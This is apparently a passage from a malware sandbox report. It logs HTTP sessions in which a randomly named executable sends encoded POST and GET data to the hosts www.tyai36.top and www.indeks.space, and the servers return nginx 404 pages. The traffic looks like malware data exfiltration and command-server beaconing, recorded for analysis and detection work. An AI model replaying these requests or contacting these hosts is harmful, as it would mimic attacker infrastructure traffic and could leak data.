                                                                                  60192.168.11.204986638.47.207.120805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:50:44.127801895 CEST1289OUTPOST /7te8/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tyai36.top
                                                                                  Origin: http://www.tyai36.top
                                                                                  Referer: http://www.tyai36.top/7te8/
                                                                                  Content-Length: 52933
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 75 42 6c 59 77 2f 44 78 48 63 6f 4d 42 4a 72 75 2b 4d 48 54 6e 53 76 2f 37 55 38 63 76 34 49 42 65 67 71 7a 61 44 37 6a 48 59 45 51 30 73 2b 51 68 72 6c 77 50 67 52 45 38 4f 2f 41 32 34 6d 70 68 7a 58 65 64 30 75 47 32 68 44 39 42 67 39 79 69 69 42 4b 41 48 31 51 75 41 53 67 4f 55 66 5a 63 6f 36 70 36 58 52 51 36 47 76 4c 4b 5a 67 45 35 6c 64 6f 45 45 59 39 66 75 31 42 4b 5a 48 42 46 7a 7a 2f 6e 44 68 54 62 39 6b 2b 68 65 38 43 4b 48 6b 68 58 62 45 63 68 6c 38 79 73 76 38 75 54 30 67 6d 6e 79 74 4c 76 44 59 35 6e 59 75 2f 73 50 4f 45 55 72 50 6a 4c 69 50 30 62 4d 59 42 37 44 4e 74 75 39 72 44 74 48 71 56 64 45 62 37 32 37 57 6a 53 71 7a 61 6f 69 52 64 77 77 56 42 6a 33 73 71 36 2f 44 74 44 4e 69 6c 38 41 41 4c 53 56 38 34 63 59 33 66 58 4f 68 43 42 61 47 38 36 74 79 48 42 46 57 70 4d 4a 43 44 36 67 39 71 52 76 51 7a 62 32 59 62 30 68 6b 42 47 4d 62 45 36 59 65 44 6a 78 55 6b 38 56 71 56 70 4c 7a 46 49 63 51 42 6a 59 47 4a 4b 4e 72 39 70 43 31 48 78 57 47 74 44 54 6e 65 41 [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=uBlYw/DxHcoMBJru+MHTnSv/7U8cv4IBegqzaD7jHYEQ0s+QhrlwPgRE8O/A24mphzXed0uG2hD9Bg9yiiBKAH1QuASgOUfZco6p6XRQ6GvLKZgE5ldoEEY9fu1BKZHBFzz/nDhTb9k+he8CKHkhXbEchl8ysv8uT0gmnytLvDY5nYu/sPOEUrPjLiP0bMYB7DNtu9rDtHqVdEb727WjSqzaoiRdwwVBj3sq6/DtDNil8AALSV84cY3fXOhCBaG86tyHBFWpMJCD6g9qRvQzb2Yb0hkBGMbE6YeDjxUk8VqVpLzFIcQBjYGJKNr9pC1HxWGtDTneA8fnV5NYq+YTC1Ar06Gn/Qrt5drhF9lE7YN9CsGEPtsVE072mfgpzK/oJJRWcVXgKHFFwnPtSSdyXhjzuwFyERl7dGZvltS4VLocjd509Fyb1u0XIE2QIW2q/U9zuC9mXuNh7NBccIAtyzpyOF29bC4ZH1+OoYq1kISuFMhfpQGlFMXE8OjcuHCRPDNwH+13RWLIHtl3m1vg/WhWkd3mZ464amb432jrRBoVkpWQaRo/S2JmNzCs2LwAJw23czx0r8kjgEHUQ8EkBB+ZTVc3HcaDMBdBgaItL0G7zpRiheVi8qquDPW22S64YaUz0iQd/Nx+h877hx+vV9k0R18rXVDIcwbwbMpvjX5ka7tsUSiF6f5LT2yeU
                                                                                  Aug 27, 2024 17:50:44.127852917 CEST2578OUTData Raw: 65 78 44 6f 71 4e 6e 72 50 4e 58 64 52 39 47 34 42 71 34 6d 48 6c 47 66 50 6f 46 44 62 32 39 70 30 35 52 2b 52 6e 79 50 6f 72 63 4e 4d 4e 68 2b 54 72 42 6e 47 41 33 65 6b 32 65 78 48 66 31 36 39 2f 2f 31 6a 6d 45 6a 64 34 4d 4f 70 70 77 51 34 71
                                                                                  Data Ascii: exDoqNnrPNXdR9G4Bq4mHlGfPoFDb29p05R+RnyPorcNMNh+TrBnGA3ek2exHf169//1jmEjd4MOppwQ4q3CSPup24nVBmd8VBNyVpTQFUJzs/h7AVZAALet3wNbk+Jbq8vFoEFtSfYNtu9IO5q5uy1VhlUA6K+ckqce6rsTzwf88xfMtH0jHlDIlK42/Wuva3karx4Ur7YUttrvFXMAnrNApg1RGLKp9XzSczoQjGUEuEKs9e9
                                                                                  Aug 27, 2024 17:50:44.127901077 CEST9023OUTData Raw: 69 4a 6b 45 65 7a 75 34 69 52 57 61 71 43 74 6e 30 59 39 7a 4f 7a 45 72 71 45 36 76 58 48 74 36 31 41 31 52 31 5a 67 37 7a 41 42 53 4e 4d 31 2f 6c 51 50 7a 30 2b 68 49 62 47 51 34 4a 47 45 2b 61 46 39 43 78 41 6f 34 4c 51 78 59 34 4e 51 75 79 57
                                                                                  Data Ascii: iJkEezu4iRWaqCtn0Y9zOzErqE6vXHt61A1R1Zg7zABSNM1/lQPz0+hIbGQ4JGE+aF9CxAo4LQxY4NQuyW2n+sPArLfnniJ2E9FAl68J5zo0e/hvVWVI5TSeKEfZ5+TqfrPq+SPGUnK/Di810XzENuBrp/I7L+kYQLGpDPIJLOCnZal2wZSl4/qvL1YubwcXxI3DyB2SkMxdFJdt+XmxLkBS3EnH8e6J6v2pTSL+Nrsaa/SG3Iy
                                                                                  Aug 27, 2024 17:50:44.450731993 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:50:44 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b12d1b-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                  Aug 27, 2024 17:50:44.450788021 CEST1289OUTData Raw: 69 6e 5a 70 57 41 38 50 52 5a 70 77 7a 33 2b 31 4d 4f 5a 4a 6b 58 4c 74 4e 70 42 74 7a 31 62 4f 39 4f 34 2f 6d 74 4d 32 53 55 51 54 63 39 4d 54 61 5a 30 6c 63 77 33 4f 76 4c 4a 67 74 51 6a 71 39 4b 4f 70 41 6f 4d 6b 34 4d 48 43 6c 39 49 33 54 4d
                                                                                  Data Ascii: inZpWA8PRZpwz3+1MOZJkXLtNpBtz1bO9O4/mtM2SUQTc9MTaZ0lcw3OvLJgtQjq9KOpAoMk4MHCl9I3TMMS8u7v5OuBQFgaviAWe+LhUHp17DHWRkfJLqJB8uE2LjFFD79adD/9RV4fIInH0s6eIrdzcBOCuLj5MJtKLtpDHShdIFTHNnib0uWgecpdGtWJY6r2AwtETq8+9CcamN1oUdOfk4pnxFKGXLxz183tj7+Sj8r42EQ
                                                                                  Aug 27, 2024 17:50:44.450828075 CEST1289OUTData Raw: 41 50 6a 57 48 30 64 72 4d 45 48 4a 79 38 70 39 64 50 42 4d 55 6f 6c 45 56 48 64 48 73 43 36 46 69 37 38 75 54 43 64 38 63 62 46 42 45 69 64 49 74 72 4a 6b 6c 4a 65 37 78 61 45 31 56 72 72 2b 4c 50 55 4f 2b 4e 4c 58 6b 4e 39 61 71 39 2f 55 44 54
                                                                                  Data Ascii: APjWH0drMEHJy8p9dPBMUolEVHdHsC6Fi78uTCd8cbFBEidItrJklJe7xaE1Vrr+LPUO+NLXkN9aq9/UDTYdPivc47n0zyLIIn42H9Mmhoc4SFS2Ng9W2LGlbIqB/T86lr7CSlHRIuS1fcfc+ZchOoi1bJJqhq4RCmyF58lMsNOY8HxRkbBfZhcdhLaA2JDootzoaefYvfH98gvxn3M44C+N9gK3h/fb4SzBoDrTdzLiHZtMJbh
                                                                                  Aug 27, 2024 17:50:44.451117039 CEST1289OUTData Raw: 73 6b 69 75 68 2f 69 54 75 50 75 31 39 6d 68 4b 38 68 56 57 6f 33 7a 67 4e 62 69 33 43 4d 34 64 46 58 34 68 78 67 35 50 2b 64 49 33 73 2f 54 56 65 66 5a 71 71 39 6e 65 59 43 5a 73 74 4a 4c 7a 4c 72 38 31 5a 7a 6b 6a 6d 37 62 61 7a 53 61 4a 57 49
                                                                                  Data Ascii: skiuh/iTuPu19mhK8hVWo3zgNbi3CM4dFX4hxg5P+dI3s/TVefZqq9neYCZstJLzLr81Zzkjm7bazSaJWIz6WGdrbSj4cgpVcYl7oZ+aoYsYi1LrQl5wjfhNlp2DxTbwipZ/ahNwO2aauvQicyxVb7Y+xH0qlHVKjqR/XAsD/yFFfAfKmwQd6zXs3A7P8c4QSwh+iLg+xOmPWO8ItVACJnl9Lf7qYOCHT0ScPLyCnRYMve2agKE
                                                                                  Aug 27, 2024 17:50:44.451292038 CEST9023OUTData Raw: 49 48 51 62 6e 52 69 63 75 50 72 50 67 34 47 55 74 58 59 4c 48 37 77 4c 6f 52 78 63 31 68 50 4f 6d 78 2f 68 4c 62 65 48 42 41 66 2f 50 34 62 68 68 4b 32 36 37 73 71 44 55 2b 72 77 4a 65 59 39 68 58 6d 2f 58 54 35 6d 2f 76 61 64 75 2b 43 6f 48 72
                                                                                  Data Ascii: IHQbnRicuPrPg4GUtXYLH7wLoRxc1hPOmx/hLbeHBAf/P4bhhK267sqDU+rwJeY9hXm/XT5m/vadu+CoHrDJJtTGbHMp40fzsyqACtQkz9vPcpEQPZU2vezC847fxQMY4Jt6rFVmIzQSxywJVn6hWIPBWlbI018VZpIINS2USEqEH+Cs6wIgGtWJU0B/z1YPitF6Pm9JK5/ijOJK7tL0erw6alEVpSLCUs+h3akchDWBDCexlp8
                                                                                  Aug 27, 2024 17:50:44.451628923 CEST7734OUTData Raw: 4b 52 59 42 2f 4f 63 30 33 31 4e 74 4a 30 37 32 49 59 55 64 4f 37 73 65 35 39 62 2b 6e 79 6a 47 70 79 49 31 57 30 4e 44 6d 37 7a 31 4f 37 67 6f 35 77 6a 64 79 42 50 67 46 6c 44 65 59 66 43 78 74 69 7a 39 35 63 61 6f 70 5a 55 4a 4b 45 71 6a 47 6f
                                                                                  Data Ascii: KRYB/Oc031NtJ072IYUdO7se59b+nyjGpyI1W0NDm7z1O7go5wjdyBPgFlDeYfCxtiz95caopZUJKEqjGoHwRg2ItXIG9SHmAk+gNZl6XxwIby7v/LrpTOjvaa7LCQgbFVchBKz+JwhztMvQW5qS5qcWURMtVfkqzi1586PZ48jk/PU7r+SFjIp3tJpJZB0dqRrnqWicVue7E6h7+ClDGazQbdpFgIWbx+7AvGKVlEfbYj61RbU
                                                                                  Aug 27, 2024 17:50:44.451967001 CEST3867OUTData Raw: 7a 75 4b 76 56 34 45 48 38 32 76 32 36 65 44 31 53 59 68 79 4b 6e 76 38 38 6c 35 7a 39 32 53 59 73 4d 53 6f 6e 6d 67 6b 2b 58 35 79 30 4c 47 34 54 2b 56 65 41 53 78 59 56 42 54 4c 78 39 6d 75 73 50 6e 47 32 73 47 73 51 35 78 71 31 34 45 78 6c 36
                                                                                  Data Ascii: zuKvV4EH82v26eD1SYhyKnv88l5z92SYsMSonmgk+X5y0LG4T+VeASxYVBTLx9musPnG2sGsQ5xq14Exl63L4+TjbH4JKYRGSbtE8emm+yz5MGz5H3d4q8zAtcAreYk23ZZyriWp2uLKF5kTfV300zb1A9P8qWSSSqkI4Hw7dL7E6ccYILNCSXAjlffN+9dTtemHTNvAWCEYpBT3tzwZVuFJSyzWj28bQ1L/NBIMpUj14DIwpiY
                                                                                  Aug 27, 2024 17:50:44.452136040 CEST1289OUTData Raw: 62 4b 33 52 4a 38 68 56 66 57 48 5a 4a 70 6f 4e 6f 43 4e 48 35 36 59 48 77 70 36 6c 47 72 2b 45 77 53 79 30 67 68 32 56 57 64 79 53 6c 4c 6d 61 53 72 33 6d 34 72 42 31 63 37 56 76 64 31 39 65 4c 6a 51 4e 69 54 68 64 6a 58 47 59 63 53 5a 58 65 30
                                                                                  Data Ascii: bK3RJ8hVfWHZJpoNoCNH56YHwp6lGr+EwSy0gh2VWdySlLmaSr3m4rB1c7Vvd19eLjQNiThdjXGYcSZXe0+qskzbC2lF6kHKdcE/1ljXtu/1boQDtO8k6o+K1y33Z/TiHD1Cp6O2qq0g4a84gtUO/2h22GWlKyvrxPVGXSpVSNKuZLIl4H+0i4sHsd6xA54I43FH0EzuDkSUeuatgS23jVLrfydTgDcAfDCYaNFtFEojwC/+uIx
                                                                                  Aug 27, 2024 17:50:44.774113894 CEST2578OUTData Raw: 77 57 6e 72 73 56 6b 6a 6c 38 66 48 66 41 61 4e 76 56 6d 33 54 7a 67 57 36 35 32 72 6c 39 6a 42 38 6d 41 49 30 59 75 66 2f 70 4e 4a 6f 36 45 4f 4b 37 4f 70 4f 59 51 2f 30 33 43 34 34 31 2b 4a 55 70 38 52 6d 67 70 30 4e 2f 54 68 59 53 62 50 49 53
                                                                                  Data Ascii: wWnrsVkjl8fHfAaNvVm3TzgW652rl9jB8mAI0Yuf/pNJo6EOK7OpOYQ/03C441+JUp8Rmgp0N/ThYSbPISpeP2GmAlahenOCGNGAAaomznRRT1CfrTETX3yuG7NBAij52a8rK5GnNYZ9IpU/7zSQYK6JMhoRjgZtdzX7FTEKjIhaRaNqpvspoCqcztYbVSifw30SYLZtDH/zmkrfdJfYbDEbpEyF4tQ2y+v42EsM1nf2YEEx1lZ


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  61192.168.11.204986738.47.207.120805096C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:50:46.959758997 CEST523OUTGET /7te8/?AvLLLbOh=jDN4zPqbFf9yM+3zgc/bkSOt3FtgrIUvIR/YWyCTW7MfoJq2/oprJylb09/bpIujsG26CmWa4QbZN3EYlCF2dF9UrXrnLyDZVZ+LwV0bzVblUs0ijF56Mzs=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tyai36.top
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:50:47.261290073 CEST302INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:50:47 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 138
                                                                                  Connection: close
                                                                                  ETag: "66b12d1b-8a"
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  62192.168.11.2049868194.58.112.17480
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:51:00.716893911 CEST788OUTPOST /1fqp/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.indeks.space
                                                                                  Origin: http://www.indeks.space
                                                                                  Referer: http://www.indeks.space/1fqp/
                                                                                  Content-Length: 205
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 33 6f 34 52 6c 39 50 4d 34 48 42 32 71 55 77 6e 48 39 59 49 52 30 54 66 56 38 2b 39 64 6e 39 55 62 4d 68 63 61 57 67 67 43 4a 36 44 37 34 69 75 77 76 59 61 33 51 66 68 77 66 4d 59 64 36 55 67 34 54 53 45 45 75 79 47 66 73 75 33 49 52 50 67 6f 77 79 62 48 4a 44 65 73 4c 47 47 59 46 74 71 6f 46 76 37 56 77 6b 59 43 55 49 62 4e 35 7a 49 39 5a 45 47 6a 53 42 52 64 4d 31 62 64 48 62 48 61 74 46 4a 43 45 4b 6f 68 6b 47 57 73 66 50 4b 4f 41 63 4f 7a 30 69 55 47 6d 63 50 66 75 59 48 37 39 2f 33 72 62 59 34 36 6f 57 38 31 2b 36 49 4b 79 4a 7a 7a 56 76 67 6c 79 7a 61 71 55 38 67 52 41 3d 3d
                                                                                  Data Ascii: AvLLLbOh=3o4Rl9PM4HB2qUwnH9YIR0TfV8+9dn9UbMhcaWggCJ6D74iuwvYa3QfhwfMYd6Ug4TSEEuyGfsu3IRPgowybHJDesLGGYFtqoFv7VwkYCUIbN5zI9ZEGjSBRdM1bdHbHatFJCEKohkGWsfPKOAcOz0iUGmcPfuYH79/3rbY46oW81+6IKyJzzVvglyzaqU8gRA==
                                                                                  Aug 27, 2024 17:51:00.948698997 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:51:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 [TRUNCATED]
                                                                                  Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktf8[:^_mh#%%F.(fQvbIKZoH{&.YFMX.[?fqyv^zcVJIy4JHPad%WAPvT,<6,F#mSQd4V~gma+|\|j-"RAqnj4T={\DL$x7 ;TJ}mj3h,8[J~xA!hv3y?YdnabJpAS[^#9603t~D31Js8(`6Ul?a>g)u-="3]cJH?fiEZ@lTy\wi{60Pv:0Q%Y#Nh=eK$o(U#@eg.k9KAl:d$:+A&Xt^#N|%$7E|?C`uXTTJX3R<Z5.$?NN&eoRH.j;W2l?EUM| [TRUNCATED]
                                                                                  Aug 27, 2024 17:51:00.948796034 CEST1289INData Raw: ae 56 4e 38 6a 6b 93 e7 92 b4 7d 30 dd 00 f1 d1 53 18 f7 cf 88 7a f7 93 2f e1 22 8f 93 cf e3 ef 44 4e aa 77 93 cf 75 78 a4 e2 ba 05 e2 4c f1 cc d1 6a 94 a7 b4 05 6a d8 50 32 1a 05 4a 27 7a 93 d5 65 ac d3 ca ea 0d 07 76 24 bd 2f 50 c3 fe 0e 19 c8
                                                                                  Data Ascii: VN8jk}0Sz/"DNwuxLjjP2J'zev$/PB[$Pzi(wA#`a1%wtZD7(.kLYyZdB&-@VPZcN2cn)<5=f
                                                                                  Aug 27, 2024 17:51:00.948842049 CEST1239INData Raw: a7 9c 04 3d d9 b3 c8 af 38 ed 80 a7 14 0e 91 1e 40 16 1c 22 80 9e 39 3f cb 63 05 65 23 60 ec 4f 20 6c 3a 23 dd c7 ec 89 b5 d7 de 34 38 91 c9 b3 4b 74 c6 10 e9 3e 9c 8f 9e d2 63 a8 f4 38 15 2c c4 f7 60 4f bd cc 4b 0f 95 0a 57 92 87 bc d4 9b db b1
                                                                                  Data Ascii: =8@"9?ce#`O l:#48Kt>c8,`OKWpy62^="?*7(F>P8wV:_?2u2-ZNg82t.T0^S.hnEeYTg#)6Xtz(9~|I|}Jy\M:WlN?


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  63192.168.11.2049869194.58.112.17480
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:51:03.475140095 CEST1128OUTPOST /1fqp/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.indeks.space
                                                                                  Origin: http://www.indeks.space
                                                                                  Referer: http://www.indeks.space/1fqp/
                                                                                  Content-Length: 545
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 33 6f 34 52 6c 39 50 4d 34 48 42 32 73 33 34 6e 41 65 41 49 41 45 54 51 51 38 2b 39 47 33 38 38 62 4d 64 63 61 58 56 6c 58 73 53 44 37 64 47 75 78 74 77 61 32 51 66 68 6f 76 4d 64 5a 36 55 37 34 54 58 6b 45 71 79 47 66 73 36 33 4a 69 48 67 38 51 79 59 50 70 44 5a 72 4c 47 48 63 46 74 61 6f 46 72 42 56 79 59 59 43 46 55 62 4d 2f 66 49 75 63 34 48 6e 79 42 74 62 4d 31 55 50 48 62 7a 61 74 41 38 43 46 76 64 68 53 4f 57 74 2b 76 4b 50 41 63 4e 35 45 69 54 62 32 64 59 61 73 5a 30 67 50 54 2f 6b 37 73 30 79 37 65 6d 77 76 43 72 4f 54 56 38 74 32 33 71 6a 53 4f 46 6f 31 78 75 52 53 65 67 55 77 5a 33 67 6d 44 6a 4b 49 6e 70 78 77 70 2b 31 56 56 44 68 67 31 56 76 4f 48 37 49 4b 4c 4d 78 37 6f 6a 5a 61 39 37 36 47 44 75 76 38 51 47 72 77 62 2f 34 41 54 54 71 42 43 36 65 48 47 6f 37 49 39 65 43 45 43 41 51 30 50 67 47 78 55 72 6d 59 49 42 2b 54 63 4a 37 66 5a 57 56 44 41 66 36 55 6b 54 2b 67 6d 6b 74 4f 31 66 55 62 59 76 74 54 70 38 2f 43 4a 2b 64 71 57 4d 59 4c 43 4e 5a 6f 32 77 4d [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=3o4Rl9PM4HB2s34nAeAIAETQQ8+9G388bMdcaXVlXsSD7dGuxtwa2QfhovMdZ6U74TXkEqyGfs63JiHg8QyYPpDZrLGHcFtaoFrBVyYYCFUbM/fIuc4HnyBtbM1UPHbzatA8CFvdhSOWt+vKPAcN5EiTb2dYasZ0gPT/k7s0y7emwvCrOTV8t23qjSOFo1xuRSegUwZ3gmDjKInpxwp+1VVDhg1VvOH7IKLMx7ojZa976GDuv8QGrwb/4ATTqBC6eHGo7I9eCECAQ0PgGxUrmYIB+TcJ7fZWVDAf6UkT+gmktO1fUbYvtTp8/CJ+dqWMYLCNZo2wMc0qqfR+UKJKo36oXX/X0haHjjABidlbfoN0JpL8RHFoC0gu99YXJW8g61el0i8Uad6ad8SIpABisbTUkmIDbWixdPPqlhcaI43HD1huE0SnWmwMHZFvjesFTF2cLgNl9p0m+hCmuCB/0tRa9fn9WwXkpycoL1Hq6OsUeG1alKpfCHzRxCeARe3Yl57WQJSnYpBN02DLQH4akEc=
                                                                                  Aug 27, 2024 17:51:03.700158119 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Tue, 27 Aug 2024 15:51:03 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 [TRUNCATED]
                                                                                  Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktf8[:^_mh#%%F.(fQvbIKZoH{&.YFMX.[?fqyv^zcVJIy4JHPad%WAPvT,<6,F#mSQd4V~gma+|\|j-"RAqnj4T={\DL$x7 ;TJ}mj3h,8[J~xA!hv3y?YdnabJpAS[^#9603t~D31Js8(`6Ul?a>g)u-="3]cJH?fiEZ@lTy\wi{60Pv:0Q%Y#Nh=eK$o(U#@eg.k9KAl:d$:+A&Xt^#N|%$7E|?C`uXTTJX3R<Z5.$?NN&eoRH.j;W2l?EUM| [TRUNCATED]
